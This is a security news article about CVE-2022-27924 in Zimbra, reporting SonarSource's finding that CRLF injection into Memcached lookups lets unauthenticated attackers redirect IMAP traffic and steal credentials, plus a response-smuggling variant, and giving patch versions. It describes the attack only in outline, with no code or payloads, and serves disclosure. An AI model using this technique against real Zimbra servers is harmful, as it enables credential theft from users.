Technical details on a high-severity vulnerability impacting some versions of the Zimbra email solution that threat actors could exploit to steal logins sans authentication or user interaction have emerged.
The security issue is presently tracked as CVE-2022-27924 and affects Zimbra releases 8.8.x and 9.x for both open-source and its commercial versions.
Zimbra is used by organizations globally, including those in the government, financial, and educational sectors.
In a report from researchers at SonarSource, the flaw is summarized as “Memcached poisoning with an unauthenticated request.” Exploitation is performed through a CRLF injection into the username of Memcached lookups.
Memcached is an internal-service instance that keeps key/value pairs for email accounts to enhance Zimbra’s performance by minimizing the number of HTTP requests to the Lookup Service. Memcache sets and retrieves those pairs via a simple text-based protocol.
According to the researchers, a hacker could overwrite the IMAP route entries for a known username via a specially crafted HTTP request to the vulnerable Zimbra instance. Once the real user logs in, the Nginx Proxy in Zimbra forwards all IMAP traffic in plain text to the hacker, including the credentials.
“Usually, Mail clients such as Thunderbird, Microsoft Outlook, the macOS Mail app, and Smartphone mail apps store the credentials that the user used to connect to their IMAP server on disk,” says SonarSource in the report, focusing on the fact that the exploit does not need any user interaction.
Knowing the victim’s email address, which is typically easy to find, and using an IMAP client enables the hacker to exploit the vulnerability easier.
A second exploitation technique bypasses the above restrictions to steal credentials for any user without any interaction nor any knowledge about the Zimbra instance.
This is done via “Response Smuggling,” which leverages the use of a web-based client for Zimbra.
In this method, hackers hijack the proxy connection of random users with unknown email addresses. This still does not require any interaction and does not generate any alerts for the victim.
A fix has since been published in Zimbra versions ZCS 9.0.0 Patch 24.1 and ZCS 8.8.15 Patch 31.1, and has been made available since May 10, 2022.